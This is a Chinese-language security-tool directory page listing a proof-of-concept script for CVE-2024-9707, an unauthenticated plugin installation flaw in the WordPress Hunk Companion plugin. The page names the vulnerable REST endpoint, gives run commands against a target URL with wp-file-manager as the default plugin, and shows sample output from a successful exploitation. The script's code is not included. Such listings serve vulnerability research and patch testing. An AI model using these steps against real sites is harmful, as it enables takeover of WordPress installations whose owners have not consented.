Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9707-Poc — WordPress 的 Hunk Companion 插件:存在未授权插件安装/激活漏洞(影响版本至 1.8.4,含 1.8.4) | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-9707-poc
漏洞分析漏洞利用Web应用程序漏洞利用API安全测试渗透测试学习与教育
GitHubnxploited/cve-2024-9707-poc

CVE-2024-9707-Poc

WordPress 的 Hunk Companion 插件:存在未授权插件安装/激活漏洞(影响版本至 1.8.4,含 1.8.4)

查看仓库
201年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-9707-Poc 🌐

描述

此脚本利用 WordPress Hunk Companion 插件中的漏洞(CVE-2024-9707),允许未授权攻击者通过 /wp-json/hc/v1/themehunk-import REST API 端点安装和激活任意插件。

功能特性

功能描述
插件版本检测自动检查插件版本。
漏洞检查判断检测到的版本是否存在漏洞(<= 1.8.4)。
插件安装利用漏洞安装并激活指定插件。

🛠️ 安装与使用:

前提条件

  • 系统已安装 Python 3.x。
  • 所需 Python 库:requests、argparse。

安装依赖:

pip install requests

使用方法:

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site.
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: wp-file-manager).

2- 运行脚本

python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]

示例:

python CVE-2024-9707.py -u https://example.com -p wp-file-manager

输出结果

  • 版本检测:显示检测到的 Hunk Companion 插件版本。
  • 漏洞状态:告知目标是否存在漏洞。
  • 利用状态:显示插件安装尝试的结果。

成功输出

Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"

🚫 免责声明

此脚本仅用于教育目的。请负责任地使用,并且仅在你拥有或已获得明确许可的系统上测试。作者不对因使用本工具造成的任何滥用或损害负责。 作者:Khaled_alenazi | Nxploited

下载工具